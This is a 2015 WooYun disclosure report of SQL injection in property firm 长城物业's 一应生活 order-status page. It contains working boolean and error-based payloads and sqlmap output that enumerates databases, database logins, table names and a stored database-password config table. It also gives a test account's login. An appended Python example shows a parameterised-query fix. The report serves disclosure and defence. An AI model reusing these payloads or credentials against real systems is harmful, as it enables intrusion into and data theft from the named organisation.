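Vulnerability summary

Bug ID: wooyun-2015-0143499

Title: 一应生活 SQL injection can leak a large amount of information (14 databases / DBA privileges / internal-network database configuration / several hundred thousand user records)

Vendor: 长城物业

Reported by: 路人甲

Submitted: 2015-09-26 08:13

Fixed: 2015-11-14 09:38

Disclosed: 2015-11-14 09:38

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]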


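Vulnerability details

Disclosure status:

2015-09-26: Details reported to the vendor; awaiting vendor handling
2015-09-30: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the notifying body
2015-10-10: Details disclosed to core white hats and experts in related fields
2015-10-20: Details disclosed to regular white hats
2015-10-30: Details disclosed to intern white hats
2015-11-14: Details disclosed to the public

Brief description:

Detailed description:

Injection point: http://**.**.**.**/order/orderstatus?ordernum=PO201509221357345734066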

Payload: ordernum=PO201509221357345734066' AND 7406=7406 AND 'vblP'='vblP
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CHAR
(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) THEN
CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))
) AND 'hthp'='hthp
---
[21:34:32] [INFO] testing Microsoft SQL Server
[21:34:33] [INFO] confirming Microsoft SQL Server
[21:34:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[21:34:36] [INFO] fetching database names
[21:34:37] [INFO] the SQL query used returns 14 entries
available databases [14]:
[*] CCPG_District
[*] CCPG_PM
[*] CCPG_SAAS
[*] CCPG_SheShangYun
[*] CCPGSitecore_core
[*] CCPGSitecore_master
[*] CCPGSitecore_web
[*] HondaSitecore_analytics
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


[21:42:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[21:42:05] [INFO] fetching database users
[21:42:05] [INFO] the SQL query used returns 19 entries
database management system users [19]:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] CCPG\administrator
[*] CCPG\appuser00
[*] CCPG\sqladmin
[*] CCPVUMADBS00\IUSR_Umall
[*] NT AUTHORITY\SYSTEM
[*] NT Service\MSSQLSERVER
[*] NT SERVICE\ReportServer
[*] NT SERVICE\SQLSERVERAGENT
[*] NT SERVICE\SQLWriter
[*] NT SERVICE\Winmgmt
[*] sa


[21:50:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[21:50:58] [INFO] fetching tables for database: CCPG_SAAS
[21:50:59] [INFO] the SQL query used returns 65 entries
Database: CCPG_SAAS
[65 tables]
+------------------------------------+
| CC_Activity |
| CC_CCNotice |
| CC_CallBack |
| CC_Charging |
| CC_CsrAuthority |
| CC_CsrGroup |
| CC_CsrInfo |
| CC_CsrStateRecord |
| CC_CsrTasks |
| CC_FeeRate |
| CC_OutboundTask |
| CC_OutboundTaskAssign |
| CC_OutboundTask_Detail |
| CC_ReturnedTask |
| CC_SMSInfo |
| CC_SMSReceiverInfo |
| COM_AttachmentInfo |
| COM_ButtonCustomizationInfo |
| COM_DataDictionaryInfo |
| COM_District |
| COM_MenuCustomizationInfo |
| COM_ModuleActionInfo |
| COM_ModuleGroupInfo |
| COM_ModuleInfo |
| COM_OperLogInfo |
| COM_OrganizationInfo |
| COM_RoleDataAuthInfo |
| COM_RoleInfo |
| COM_RoleModuleAuthInfo |
| COM_UserGroupInfo |
| COM_UserGroupRoleInfo |
| COM_UserGroupUserInfo |
| COM_UserInfo |
| COM_UserOrganizationInfo |
| COM_UserRoleInfo |
| CP_BlackList |
| CP_Block |
| CP_Block_DELETE |
| CP_Block_old |
| CP_CallDetailInfo |
| CP_ContractEEServiceInfo |
| CP_ContractInfo |
| CP_ContractOCRMServiceInfo |
| CP_ContractPMSServiceInfo |
| CP_ContractServiceInfo |
| CP_DBConfigInfo |
| CP_MemberBlock |
| CP_MemberBlock_old |
| CP_MemberEEServiceInfo |
| CP_MemberInfo |
| CP_MemberLineNumber |
| CP_MemberOCRMServiceInfo |
| CP_MemberPMSServiceInfo |
| CP_MemberResource |
| CP_MemberWorkorderUpgradeSetting |
| CP_MessageAccountInfo |
| CP_MessageAccountPaymentRecordInfo |
| CP_NoticeMessageInfo |
| CP_QuestionCommentInfo |
| CP_QuestionCommentInfo_Bak |
| CP_QuestionInfo |
| CP_QuestionInfo_Bak |
| CP_SendMessageInfo |
| CP_ServiceInfo |
| CP_ServiceTrialApplicationInfo |
+------------------------------------+


Internal-network database configuration table

[22:00:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[22:00:09] [INFO] fetching columns for table 'CP_DBConfigInfo' in database 'CC
_SAAS'
[22:00:11] [INFO] the SQL query used returns 13 entries
[22:00:11] [INFO] retrieved: Created_Time
[22:00:16] [INFO] retrieved: datetime
[22:00:17] [INFO] retrieved: Created_User
[22:00:18] [INFO] retrieved: nvarchar
[22:00:19] [INFO] retrieved: DB_Address
[22:00:20] [INFO] retrieved: nvarchar
[22:00:20] [INFO] retrieved: DB_Name
[22:00:21] [INFO] retrieved: nvarchar
[22:00:22] [INFO] retrieved: DB_Password
[22:00:23] [INFO] retrieved: nvarchar
[22:00:34] [INFO] retrieved: DB_Username
[22:00:35] [INFO] retrieved: nvarchar
[22:00:36] [INFO] retrieved: GC_Flag
[22:00:37] [INFO] retrieved: bit
[22:00:38] [INFO] retrieved: ID
[22:00:39] [INFO] retrieved: uniqueidentifier
[22:00:39] [INFO] retrieved: ID_DB_Type
[22:00:41] [INFO] retrieved: uniqueidentifier
[22:00:42] [INFO] retrieved: ID_Member
[22:00:43] [INFO] retrieved: uniqueidentifier
[22:00:43] [INFO] retrieved: Updated_Time
[22:00:45] [INFO] retrieved: datetime
[22:00:51] [INFO] retrieved: Updated_User
[22:00:52] [INFO] retrieved: nvarchar
[22:00:53] [INFO] retrieved: Url_Code
[22:00:54] [INFO] retrieved: nvarchar
[22:00:54] [INFO] fetching entries for table 'CP_DBConfigInfo' in database 'CC
_SAAS'
[22:00:55] [INFO] retrieved: 61
[22:00:55] [INFO] fetching number of distinct values for column 'ID'
[22:00:55] [INFO] retrieved: 61
[22:00:55] [INFO] using column 'ID' as a pivot for retrieving row data


The CCPG_SheShangYun database has too many tables to post in full

[22:06:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[22:06:44] [INFO] fetching tables for database: CCPG_SheShangYun
[22:06:46] [INFO] the SQL query used returns 2118 entries


http://**.**.**.**/Login/Login.aspx
Account: test
Password: 123456


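Proof of vulnerability:

Remediation:

Filter the special characters used in SQL injection

Copyright notice: please credit the source when reposting: 路人甲@乌云 (WooYun)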
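
For the `ordernum` parameter in this report, binding the value as a query parameter, with an allow-list format check in front of it, removes the injection. The following is an added example, not code from the original report or from the vendor: it uses Python with an in-memory SQLite table in place of the ASP.NET / SQL Server stack, and the `orders` table, its columns, the function names and the "PO + 21 digits" format are assumptions.

```python
import re
import sqlite3

# Order number and boolean payload as shown in the report; the rest is constructed.
ORDERNUM = "PO201509221357345734066"
PAYLOAD_TRUE = ORDERNUM + "' AND 7406=7406 AND 'vblP'='vblP"
# Same shape with a false predicate (constructed for comparison).
PAYLOAD_FALSE = ORDERNUM + "' AND 7406=7407 AND 'vblP'='vblP"

# Assumed allow-list format: "PO" followed by exactly 21 ASCII digits.
ORDERNUM_RE = re.compile(r"PO[0-9]{21}")


def make_db():
    """Build a constructed one-row table standing in for the order store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (ordernum TEXT PRIMARY KEY, status TEXT)")
    db.execute("INSERT INTO orders VALUES (?, ?)", (ORDERNUM, "paid"))
    return db


def status_concat(db, ordernum):
    """Vulnerable pattern: the request value is spliced into the SQL text."""
    sql = "SELECT status FROM orders WHERE ordernum = '" + ordernum + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def status_bound(db, ordernum, validate=True):
    """Hardened pattern: optional allow-list check, then a bound parameter."""
    if validate and not ORDERNUM_RE.fullmatch(ordernum):
        return None  # reject anything that is not a well-formed order number
    row = db.execute(
        "SELECT status FROM orders WHERE ordernum = ?", (ordernum,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for label, value in (("legit", ORDERNUM),
                         ("true predicate", PAYLOAD_TRUE),
                         ("false predicate", PAYLOAD_FALSE)):
        print(label, "| concat:", status_concat(db, value),
              "| bound:", status_bound(db, value, validate=False))
```

With concatenation the two payloads return different results, which is the true/false signal that boolean-based testing relies on; with binding, both are simply order numbers that do not exist, even when the format check is switched off.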


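Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-30 09:38

Vendor reply:


CNVD confirmed and reproduced the situation described, and has notified the website's administrators by email through their publicly listed contact channel; they are to provide a fix subsequently.

Latest status:

None yet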